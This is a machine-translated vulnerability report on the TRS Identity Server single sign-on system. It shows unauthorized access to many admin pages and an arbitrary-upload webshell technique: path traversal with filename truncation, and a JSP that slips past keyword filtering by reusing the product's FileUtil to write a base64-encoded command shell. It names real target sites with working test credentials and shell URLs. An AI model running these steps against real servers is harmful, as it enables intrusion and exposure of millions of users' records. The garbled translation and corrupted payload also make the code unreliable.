A large set of unauthorized operations and GETSHELL of a system in TRS

A large set of unauthorized operations and GETSHELL of a system in TRS

Earlier versions and secondary development seem to be unaffected... security is endless!

/*

* Note:

* Copyright? 2004-2006 TRS not affected

* Copyright? 2004-2008 TRS not affected

* And some secondary development will not be affected

*--------------------------------------

* Excessive permissions can be used to view User information. In several cases, millions of users have been added ~

*/

Program name: TRS Identity Server single-point logon System

Vulnerability Type: unauthorized operation & Arbitrary File Upload GETSHELL

Vulnerability files:

Unauthorized operations (I did not count the number of points, but there were so many points ):

/Ids/admin/sys/system/editSysParaCfg. jsp system parameter settings/ids/admin/sys/system/editRegCfg. jsp system registration related parameter settings (can be changed to the receiving mailbox ...) /ids/admin/sys/system/editRealNameCfg. jsp real-name Authentication related parameter settings (you can set the upload path and upload type)/ids/admin/sys/system/editLoginCfg. jsp User Logon related parameter configuration/ids/admin/sys/verifyCode/editVerifyCodeParaCfg. jsp Verification Code parameter settings/ids/admin/sys/navigation. jsp system configuration/ids/admin/notifycation/list. jsp mailing list/ids/admin/notifycation/detailMessage. jsp? Id = xxx notification module (which contains the registered password in plaintext)/ids/admin/user/list. jsp user list (password resetting)/ids/admin/ldap/domain/config_dir.jsp LDAP directory setting information/ids/admin/ad/domain/add. in jsp, add the domain information/ids/admin/sys/database/viewDbInfoCfg. view the database connection/ids/admin/sys/http/edit in jsp. set ids/admin/sys/accessPermission/edit in jsp HTTP parameters. jsp access control global parameter settings/ids/admin/sys/auth/editCACfg. jsp certificate parameter settings/ids/admin/sys/customfield/addColumn. jsp? BoName = User add attribute/ids/admin/sys/customfield/list. jsp attribute list/ids/admin/sys/group/editGroupAttributesMapping. jsp organization parameter settings/ids/admin/sys/sso/edit. jsp cross-origin Single Sign-On parameter settings/ids/admin/sys/synchronize/synchronizationConfig. jsp synchronization server parameter settings http://idss.haier.net/ids/admin/sys/synchronize/listSynchronizer.jsp Sync Server LIST/ids/admin/coapp/viewUserSynchronization. jsp system [ids] user synchronization configuration/ids/admin/archivelog/config. jsp log Archiving

Upload any file:

Account/uploadAuthInfo. jsp



Method of exploits:
 

Mask Region

*****?? Number and other management operations; a common user has a page to upload an ID card ,*****

I:

Let's take a look at the excessive permissions first, and pick a serious demonstration. Others have been tested. There is indeed a problem of loose permission filtering.



Case 1:
 

Mask Region

1.http://**.**.**/ids/_*****?trsadmin*****

Log in first:
 

View the user list (2 W + users ):

Http: // www. *******. com/ids/admin/user/list. jsp
 

Configure real-name authentication:

Http: // www. *****. com/ids/admin/sys/system/editRealNameCfg. jsp
 

System parameter settings:

Http: // www. ****. com/ids/admin/sys/system/editSysParaCfg. jsp
 

Message Queue to be sent:

Http: // www. *****. com/ids/admin/yycation/list. jsp
 

Instance 2:
 

Mask Region

1.http://**.**.**/ids/  _*****?trsadmin*****

Similarly, log on to a common user first:

Http: // *****. net/ids/account/main. jsp
 

Then access the user list (42 W + users ):

Http: // *****. net/ids/admin/user/list. jsp
 

Check the database connection information again:

Http: // ***. net/ids/admin/sys/database/viewDbInfoCfg. jsp
 

Check the system registration parameters (you can change the Administrator's email address ):

Http: // *****. net/ids/admin/sys/system/editRegCfg. jsp
 

Instance 3:
 

Mask Region

1.https://**.**.**/ids/admin/login.jsp _*****?trsadmin*****

The steps are the same. log on to the user list directly (45 + users ):

Https: // www. ***** .gov.cn/ids/admin/user/list.jsp
 

Check to create an Active Directory domain:

Https: // www. **** .gov.cn/ids/admin/ad/domain/add.jsp
 

Instance 4:
 

Mask Region

1.http://**.**.**/ids/admin/_*****?trsadmin*****

Logon user list (20 million + users ):
 

Check the certificate parameter settings again:

Http: // ****** .com.cn/ids/admin/sys/auth/editCACfg.jsp
 

Let's look at the cross-origin Single Sign-On parameter settings:

Http: // ***** .com.cn/ids/admin/sys/sso/edit.jsp
 

Instance 5:
 

Mask Region

1.http://**.**.**/ids/admin/_*****?trsadmin*****

Log on to the user list as follows:
 

Let's look at it again:

Http: // ***** .ac.cn/ids/admin/sys/navigation.jsp
 

 

II:

Upload Arbitrary files

File:/ids/account/uploadAuthInfo. jsp

Some code is pasted out:

If (this. realNameAuthenticationService. isApply (userName) {// if the file has been uploaded, the file name should be named by the user name, and the file name can be controlled. As a result, you can cut the upload UserRealNameInfo uRealNameInfo = null; uRealNameInfo = this. realNameAuthenticationManager. find (userName); uploadFile = this. imageFileManager. find (uRealNameInfo. getUploadFileId (); uploadFile. setNewFileName (userName + ". "+ fileType); uploadFile. setUploadTime (System. currentTimeMillis (); uploadFile. setOriginalFileName (fileName); uploadFile. setFileSize (fileSize); uploadFile. setImageUrl (uploadPath); uploadFile. setType (type); this. imageFileManager. update (uploadFile); LOG. debug ("update User realName authentication upload file success:" + uploadFile);} else {uploadFile. setNewFileName (userName + ". "+ fileType); // same as above. This is the first upload to use uploadFile. setUploadTime (System. currentTimeMillis (); uploadFile. setOriginalFileName (fileName); uploadFile. setFileSize (fileSize); uploadFile. setImageUrl (uploadPath); uploadFile. setNewFileName (DateUtil. timeMillisToString (System. currentTimeMillis (), "yyyyMM") + File. separator + uploadFile. getNewFileName (); uploadFile. setType (type); this. imageFileManager. add (uploadFile); LOG. debug ("add User realName authentication upload file success:" + uploadFile );}

Because trs default upload to/WEB-INF/private/directory, there are two ways to break through, one is through the file name to jump :/.. /.. /.. /username.jsp000000.jpg. The shell file is generated in the/ids/directory. The other method is to use the/ids/admin/sys/system/editRealNameCfg. jsp partition to truncate the file. The file is stored in the/ids/Set directory/current year/user name. jsp



Instance 1:



Http://idss.haier.net/ids/

Username and password: trsadmin1/trsadmin1



Shell address after upload: http: // ******. net/ids/account/201501/trsadmin1.jsp
 

Instance 2:



Http://app.sdwr.gov.cn/ids/admin/login.jsp

Username and password: trsadmin1/trsadmin1



Shell address: http: // app. ***** .gov.cn/ids/trsadmin1.jsp
 

Instance 3:



Http://ids.shjnet.cn/ids/admin/login.jsp

Username and password: trsadmin1/trsadmin1



Shell address: http: // ids. *****. cn/ids/201501/trsadmin1.jsp
 

Instance 4:



Http://www.catr.cn/ids/

Username and password: trsadmin1/trsadmin1



Shell: http: // www. ****. cn/ids/trsadmin1.jsp
 

Instance 5:



Http://www.hisense.com/ids/

Username and password: trsadmin1/trsadmin1



This filtering method checks submitted inputstream, filters out exec, XXXputStream, and other keywords. Generally, shell contains such keywords, here we can write shell through FileUtil provided by the trsids-server.jar itself:

In com. trs. idm. utilFileUtil. class, we only need these two functions.

Public static void createTxtFile (File f) {if (! F. exists () {try {f. createNewFile ();} catch (IOException e) {LOG. error ("error while create new file:" + f, e);} LOG. debug (f + "created! ");} Else {LOG. debug (f +" already exists! ") ;}} Public static void out (File f, String str) {out (f, str," ");} public static void out (File f, String str, string enc) {if (StringHelper. isEmpty (enc) {enc = "UTF-8";} FileOutputStream fos = null; OutputStreamWriter out = null; BufferedWriter writer = null; try {fos = new FileOutputStream (f, true ); out = new OutputStreamWriter (fos, enc); writer = new BufferedWriter (out); writer. write (st R); writer. newLine (); writer. flush (); LOG. debug ("write str:" + str + "to file:" + f);} catch (IOException e) {LOG. error ("error while write string:" + str + "to file:" + f, e); try {if (writer! = Null) {writer. close (); writer = null;} if (out! = Null) {out. close (); out = null ;}} catch (IOException e) {LOG. error ("error while close writer and out", e) ;}finally {try {if (writer! = Null) {writer. close (); writer = null;} if (out! = Null) {out. close (); out = null ;}} catch (IOException e) {LOG. error ("error while close writer and out", e );}}}

/**

* Call the tool class in the known jar file to break through the data stream detection. getshell is successfully called.

*/

<% @ Page import = "sun. misc. BASE64Decoder, java. io. *, java. util. *, com. trs. idm. util. fileUtil "contentType =" text/html; charset = UTF-8 "%> // introduce FileUtil

<%

String str = "/TRS/TRSIDS3.5/webapps/ids/account/trsadmin11.jsp ";

File f = new File (str );

FileUtil. createTxtFile (f );

StringBuffer sb = new StringBuffer ("");

Sb. append ("PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU + PCV0cnkge1N0cmluZyBjbWQgPSByZXF1ZXN0L ");

Sb. append ("success ");

Sb. append ("success ");

Sb. append ("success ");

Sb. append ("success ");

Sb. append ("separator = ");

String base64_str = new String (new BASE64Decoder (). decodeBuffer (sb. toString ()));

FileUtil. out (f, base64_str );

%>



Upload the above file, with the truncation of the user name, and then access the user name. jsp, the shell file will be generated in the specified folder



Shell address: http: // www. *****. com/ids/account/trsadmin11.jsp? Cmd = id
 

 

Solution:

Filter